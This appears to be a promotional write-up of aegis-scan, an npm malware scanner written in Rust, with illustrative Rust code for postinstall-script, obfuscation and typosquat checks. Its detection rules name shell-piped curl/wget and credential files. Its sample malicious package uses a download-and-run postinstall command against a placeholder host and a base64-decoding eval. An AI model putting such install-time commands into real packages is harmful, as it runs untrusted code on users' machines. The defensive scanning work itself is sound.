I built an npm malware scanner in Rust because npm audit isn't enough
Open-source Rust CLI scanner detects malicious npm packages before installation.
aegis-scan is a Rust CLI that scans npm packages locally for malware before they are installed. It combines AST analysis of the package's JavaScript (via tree-sitter), inspection of install-time lifecycle scripts such as postinstall, and CVE lookups against OSV.dev, and assigns each package a 0-10 risk score. The detections cover obfuscated eval, malicious postinstall scripts, signs of maintainer takeover, packages whose names match AI-hallucinated dependencies, and typosquatting of popular package names; a GitHub Action provides CI integration.
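To make the detection logic concrete, here is an added example in Rust of the kinds of checks such a scanner runs. It is illustrative code written for this page, not aegis-scan's own: it uses plain string heuristics over a postinstall script and a JavaScript source instead of a tree-sitter AST, a Levenshtein-distance typosquat check against a constructed list of popular package names, and a summed score capped at 10. The rule names, weights, the `Finding` and `PackageInput` types, and the sample inputs are all this example's assumptions; the OSV.dev lookup is omitted because it needs network access.

```rust
// Added illustration of npm malware-scanner heuristics (std only).
// Rule names, weights and sample inputs are assumptions made for this example;
// a real scanner would parse the JS into an AST rather than match substrings.

/// One matched rule and the weight it contributes to the 0-10 score.
#[derive(Debug, Clone, PartialEq)]
pub struct Finding {
    pub rule: &'static str,
    pub weight: u8,
}

/// Minimal stand-in for the parts of package.json and the entry point we inspect.
pub struct PackageInput<'a> {
    pub name: &'a str,
    pub postinstall: Option<&'a str>,
    pub main_js: &'a str,
}

/// Inspect a lifecycle script (e.g. the "postinstall" value) for install-time abuse.
pub fn inspect_install_script(script: &str) -> Vec<Finding> {
    let s = script.to_ascii_lowercase();
    let mut out = Vec::new();
    // Download-and-execute at install time: curl/wget piped into a shell.
    let downloads = s.contains("curl ") || s.contains("wget ");
    let pipes_to_shell = ["| sh", "|sh", "| bash", "|bash"].iter().any(|p| s.contains(p));
    if downloads && pipes_to_shell {
        out.push(Finding { rule: "remote-code-pipe", weight: 6 });
    }
    // Reaching for credential files that an install script has no business touching.
    if s.contains(".npmrc") || s.contains(".ssh") || s.contains("/etc/passwd") {
        out.push(Finding { rule: "credential-file-access", weight: 5 });
    }
    // Inline node one-liner decoding a base64 payload.
    if s.contains("node -e") && s.contains("base64") {
        out.push(Finding { rule: "inline-encoded-payload", weight: 5 });
    }
    out
}

/// Crude obfuscation check over JS source text: dynamic code execution fed by
/// a decoding step, and long runs of hex escapes.
pub fn inspect_js_source(src: &str) -> Vec<Finding> {
    let mut out = Vec::new();
    let dynamic_exec = src.contains("eval(") || src.contains("new Function(");
    let decodes = src.contains("fromCharCode")
        || src.contains("atob(")
        || (src.contains("Buffer.from(") && src.contains("base64"));
    if dynamic_exec && decodes {
        out.push(Finding { rule: "obfuscated-eval", weight: 7 });
    }
    if src.matches("\\x").count() >= 8 {
        out.push(Finding { rule: "hex-escape-run", weight: 3 });
    }
    out
}

/// Levenshtein edit distance (two-row dynamic programme).
pub fn edit_distance(a: &str, b: &str) -> usize {
    let a: Vec<char> = a.chars().collect();
    let b: Vec<char> = b.chars().collect();
    let mut prev: Vec<usize> = (0..=b.len()).collect();
    let mut cur = vec![0usize; b.len() + 1];
    for i in 1..=a.len() {
        cur[0] = i;
        for j in 1..=b.len() {
            let cost = if a[i - 1] == b[j - 1] { 0 } else { 1 };
            cur[j] = (prev[j] + 1).min(cur[j - 1] + 1).min(prev[j - 1] + cost);
        }
        std::mem::swap(&mut prev, &mut cur);
    }
    prev[b.len()]
}

/// A name within edit distance 1..=2 of a popular package, but not identical to it,
/// is a typosquat candidate. Returns the closest popular name and the distance.
pub fn typosquat_candidate<'a>(name: &str, popular: &[&'a str]) -> Option<(&'a str, usize)> {
    popular
        .iter()
        .filter(|p| **p != name)
        .map(|p| (*p, edit_distance(name, p)))
        .filter(|(_, d)| *d >= 1 && *d <= 2)
        .min_by_key(|(_, d)| *d)
}

/// Sum rule weights and cap at 10 (the scoring model is an assumption here).
pub fn risk_score(findings: &[Finding]) -> u8 {
    findings.iter().map(|f| f.weight as u32).sum::<u32>().min(10) as u8
}

/// Run every check over one package and return (score, findings).
pub fn scan(pkg: &PackageInput, popular: &[&str]) -> (u8, Vec<Finding>) {
    let mut findings = Vec::new();
    if let Some(script) = pkg.postinstall {
        findings.extend(inspect_install_script(script));
    }
    findings.extend(inspect_js_source(pkg.main_js));
    if typosquat_candidate(pkg.name, popular).is_some() {
        findings.push(Finding { rule: "typosquat", weight: 4 });
    }
    let score = risk_score(&findings);
    (score, findings)
}

fn main() {
    // Constructed inputs: a fake "lodas" package with a download-and-run postinstall
    // and a base64-decoding eval, alongside a benign package.
    let popular = ["lodash", "express", "react", "chalk"];
    let bad = PackageInput {
        name: "lodas",
        postinstall: Some("curl https://example.invalid/x.sh | sh"),
        main_js: "const p = Buffer.from(\"...\", \"base64\").toString(); eval(p);",
    };
    let good = PackageInput { name: "lodash", postinstall: None, main_js: "module.exports = (a, b) => a + b;" };
    for pkg in [&bad, &good] {
        let (score, findings) = scan(pkg, &popular);
        println!("{}: score {}/10, findings {:?}", pkg.name, score, findings);
    }
}
```

Each rule contributes a fixed weight and the sum is capped, so a package that trips several independent signals saturates at 10 while a single weak signal stays well below any sensible CI threshold; the typosquat rule is deliberately distance-bounded so that genuinely different names do not match.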
Integrate aegis-scan into your GitHub Actions pipeline to automatically flag high-risk npm dependencies before they reach production.
For teams building cloud-native systems, a compromised npm dependency is a direct path into production infrastructure. aegis-scan addresses this with a local, open-source scanner that runs inside CI and has no SaaS dependency, which keeps package contents and scan results on the build machine.